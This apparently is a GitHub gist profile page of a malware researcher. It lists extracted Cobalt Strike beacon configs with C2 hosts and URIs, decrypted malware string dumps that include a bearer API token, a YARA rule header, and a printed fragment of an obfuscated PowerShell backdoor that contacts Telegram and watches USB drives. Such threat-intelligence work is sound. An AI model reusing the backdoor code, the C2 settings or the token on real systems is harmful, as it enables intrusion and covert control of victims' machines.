Skip to content

Instantly share code, notes, and snippets.

View usualsuspect's full-sized avatar

usualsuspect

31 followers · 5 following
View GitHub Profile
@usualsuspect
usualsuspect / config.txt
Created March 13, 2023 13:35
NY Times Cobalt Strike Config
BeaconType - HTTPS
Port - 443
SleepTime - 165000
MaxGetSize - 2097223
Jitter - 77
MaxDNS - Not Found
PublicKey_MD5 - 59c484f9028a06073eb133568ef23de1
C2Server - content.api.nytimes.com,/caa09abd7511/XNc549Rf1p3VXb6h2g8q9ey6pp,csp.nytimes.com,/caa09abd7511/eXlTjaR3heoufbSNC-H4EJbCnOqpn
UserAgent - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
HttpPostUri - /921d522938b2/GmFoRGmqwNIbBmPUEKtJE
@usualsuspect
usualsuspect / config.txt
Created March 8, 2023 11:44
Unknown Cobalt Strike config
BeaconType - HTTPS
Port - 443
SleepTime - 60000
MaxGetSize - 1398104
Jitter - 30
MaxDNS - Not Found
PublicKey_MD5 - 4dbaa2821fcfa995554ad7612a869a6d
C2Server - exdiy.com,/web/portal
UserAgent - Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
HttpPostUri - /logon/index.php
@usualsuspect
usualsuspect / strings.txt
Created March 6, 2023 11:30
Decrypted strings for GraphicalNeutrino sample e957326b2167fa7ccd508cbf531779a28bfce75eb2635ab81826a522979aeb98
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
c:\windows\system32\
content-type: application/json
accept: application/json
notion-version: 2022-06-28
authorization: Bearer secret_X92sXCVWoTk63aPgGKlPBBmHVmuKXJ2geugKa7Ogj7s
api.notion.com
GetProcessImageFileNameA
RegOpenKeyExA
RegSetValueExA
@usualsuspect
usualsuspect / zip_ext.yara
Last active December 24, 2022 04:57
YARA rule to match zips containing specific file extensions
rule zip_with_ext
{
meta:
author = "@jaydinbas"
description = "Only match zip files containing desired file extensions"
strings:
$file_sig = "PK\x03\x04" //zip header sig
$entry_sig = "PK\x01\x02" //ZIPDIRENTRY sig
@usualsuspect
usualsuspect / config.txt
Created December 22, 2022 15:49
OBRELA SECURITY INDUSTRIES SINGLE MEMBER Cobalt Strike
BeaconType - SMB
Port - 4444
SleepTime - 10000
MaxGetSize - 2097152
Jitter - 0
MaxDNS - 0
PublicKey_MD5 - 5b37cfe101c82935e6034078db979280
C2Server -
UserAgent -
HttpPostUri -
@usualsuspect
usualsuspect / applejeus_custom_string_dec.py
Created December 2, 2022 04:34
AppleJeus malware custom string decryption
#!/usr/bin/env python3
#
# Author: @jaydinbas
#
# Custom string decryption used by AppleJeus malware
# See https://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/
#
# Reference sample: 9352625b3e6a3c998e328e11ad43efb5602fe669aed9c9388af5f55fadfedc78
# Found in function sub_180001830
@usualsuspect
usualsuspect / core.ps1
Created November 25, 2022 17:24
Unknown PowerShell backdoor using Telegram/GitHub
(('[Net.ServicePointManager]::Se'+'curityProtocol=[Net.SecurityProtocolType]::Tls12;
NyQErrorActionPreference=zCwContinuezCw;
NyQa=zCwap'+'i.telegram.orgzCw;
do{Slee'+'p(Get-Random 100)}while'+'((iwr NyQa).StatusCode -ne 20'+'0)
NyQ'+'Query = zCwselect * from __InstanceCreationE'+'vent within 5 where Target'+'Instance'+' ISA sn4Win32_LogicalDisk'+'sn4 and TargetInstance.DriveType = 2zCw;
Ny'+'QAction = {
(gwmi cim_logicaldiskugE?{(NyQ_.drivetype -eq 2)-and(T'+'est-path '+'z'+'CwNyQ(NyQ_.dev'+'iceid)byfzCw)'+'}).DeviceIDugE%'+'{
'+' if(NyQnull'+' -eq NyQ_){return}
'+'
try{Expand-Archive -Path zCwNyQenv:tempbyfxxx.zipzCw -DestinationPath zCwNyQenv:te'+'mpzCw -force}catch{
@usualsuspect
usualsuspect / config.txt
Created November 24, 2022 12:59
solar.huawei.com Cobalt Strike config
BeaconType - HTTP
Port - 80
SleepTime - 30000
MaxGetSize - 1412693
Jitter - 37
MaxDNS - Not Found
PublicKey_MD5 - 319f36ab624b44c836f42decabcfcb6c
C2Server - solar.huawei.com,/audiencemanager.js
UserAgent - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4044.62 Safari/537.36
HttpPostUri - /audiencemanager-v2.js
@usualsuspect
usualsuspect / ekun_config.txt
Created November 3, 2022 16:21
ekun.exe Cobalt Strike config
BeaconType - HTTP
Port - 80
SleepTime - 45000
MaxGetSize - 1403644
Jitter - 37
MaxDNS - Not Found
PublicKey_MD5 - 005a71d162794e4bc436f8a38e017910
C2Server - 20.203.182.34,/jwquery-3.3.1.min.js
UserAgent - Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
HttpPostUri - /jwquery-3.3.2.min.js
@usualsuspect
usualsuspect / decrypted_strings.txt
Created October 21, 2022 14:55
Unknown malware decrypted strings
Accept-Encoding
gzip,deflate
Method
POST
win
desktop
art-pc
/
id=
&mail=